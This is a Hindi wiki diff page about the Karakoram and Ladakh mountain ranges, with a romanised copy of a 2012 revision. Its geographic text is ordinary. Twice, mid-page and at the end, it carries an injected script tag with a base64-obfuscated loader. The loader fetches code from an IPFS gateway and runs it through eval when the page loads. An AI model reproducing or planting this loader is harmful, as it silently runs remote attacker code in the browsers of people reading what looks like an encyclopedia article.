Difference between revisions of "कराकोरम पर्वतश्रेणी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
Line 1: Line 1:
*ग्रेनाइट-पट्टिताश्म का विशाल पर्वत पिंड, कराकोरम श्रृंखला, भारतीय क्षेत्र से [[पाकिस्तान|पाकिस्तानी भूमि]] तक फैली हुई है।  
+
[[चित्र:Karakoram-Mountains.jpg|thumb|250px|कराकोरम पर्वतश्रेणी]]
 +
'''कराकोरम पर्वतश्रेणी''' भारतीय क्षेत्र से [[पाकिस्तान|पाकिस्तानी भूमि]] तक फैली हुई, ग्रेनाइट-पट्टिताश्म का विशाल पर्वत पिंड है।
 
*इसमें संसार की सर्वोच्च चोटियों में से कुछ हैं, जिसमें से एक के-दो है, जिसकी ऊँचाई 8,611 मीटर है।  
 
*इसमें संसार की सर्वोच्च चोटियों में से कुछ हैं, जिसमें से एक के-दो है, जिसकी ऊँचाई 8,611 मीटर है।  
 
*कम से कम 30 अन्य चोटियाँ 7,315 मीटर से अधिक ऊँची हैं।  
 
*कम से कम 30 अन्य चोटियाँ 7,315 मीटर से अधिक ऊँची हैं।  
*यह पर्वतमाला, जो बड़े भारी ग्लेशियरों से पटी पड़ी है, शुष्क और वीरान पठारों से ऊपर उभरी हुई हैं।  
+
*यह पर्वतमाला, जो बड़े भारी [[ग्लेशियर|ग्लेशियरों]] से पटी पड़ी है, शुष्क और वीरान पठारों से ऊपर उभरी हुई हैं।  
*विषम तापमान और विखंडित चट्टानों के मलबे इसकी विशेषताएँ हैं।  
+
*विषम [[तापमान]] और विखंडित चट्टानों के मलबे इसकी विशेषताएँ हैं।  
 
*कराकोरम को 'दुनिया की छत' कहा जाना बिल्कुल उचित प्रतीत होता है।  
 
*कराकोरम को 'दुनिया की छत' कहा जाना बिल्कुल उचित प्रतीत होता है।  
 
==लद्दाख पर्वत श्रृंखला==
 
==लद्दाख पर्वत श्रृंखला==
Line 10: Line 11:
 
*लगभग 6,100 मीटर की शीर्ष रेखा वाली यह श्रृंखला [[सिंधु नदी]] के पूर्वोत्तर तट के समानांतर स्थित है। उत्तरी पाकिस्तान में सिंधु नदी के दक्षिण-पूर्व में स्थित देवसई पहाड़ियों को कभी-कभी इस श्रृंखला का हिस्सा मान लिया जाता है।  
 
*लगभग 6,100 मीटर की शीर्ष रेखा वाली यह श्रृंखला [[सिंधु नदी]] के पूर्वोत्तर तट के समानांतर स्थित है। उत्तरी पाकिस्तान में सिंधु नदी के दक्षिण-पूर्व में स्थित देवसई पहाड़ियों को कभी-कभी इस श्रृंखला का हिस्सा मान लिया जाता है।  
  
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 18: Line 18:
 
|शोध=
 
|शोध=
 
}}
 
}}
{{संदर्भ ग्रंथ}}
+
==वीथिका==
 +
<gallery>
 +
चित्र:Karakoram-Highway.jpg|कराकोरम राजमार्ग, [[पाकिस्तान]]
 +
चित्र:Karakoram-Highway-1.jpg|कराकोरम राजमार्ग
 +
</gallery>
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 26: Line 30:
 
[[Category:भूगोल कोश]]
 
[[Category:भूगोल कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 07:04, 16 March 2012

thumb|250px|karakoram parvatashreni karakoram parvatashreni bharatiy kshetr se pakistani bhoomi tak phaili huee, grenait-pattitashm ka vishal parvat piand hai.

  • isamean sansar ki sarvochch chotiyoan mean se kuchh haian, jisamean se ek ke-do hai, jisaki ooanchaee 8,611 mitar hai.
  • kam se kam 30 any chotiyaan 7,315 mitar se adhik ooanchi haian.
  • yah parvatamala, jo b de bhari gleshiyaroan se pati p di hai, shushk aur viran patharoan se oopar ubhari huee haian.
  • visham tapaman aur vikhandit chattanoan ke malabe isaki visheshataean haian.
  • karakoram ko 'duniya ki chhat' kaha jana bilkul uchit pratit hota hai.

laddakh parvat shrriankhala

  • laddakh parvat shrriankhala karakoram shrriankhala ka ek hissa hai.
  • yah uttari pakistan mean shyok nadi ke udgam sthal se shuroo hokar uttari bharat se guzarata hua 370 kimi dakshin-poorv mean tibbat (chin) sima tak phaila hua hai.
  • lagabhag 6,100 mitar ki shirsh rekha vali yah shrriankhala siandhu nadi ke poorvottar tat ke samanaantar sthit hai. uttari pakistan mean siandhu nadi ke dakshin-poorv mean sthit devasee paha diyoan ko kabhi-kabhi is shrriankhala ka hissa man liya jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>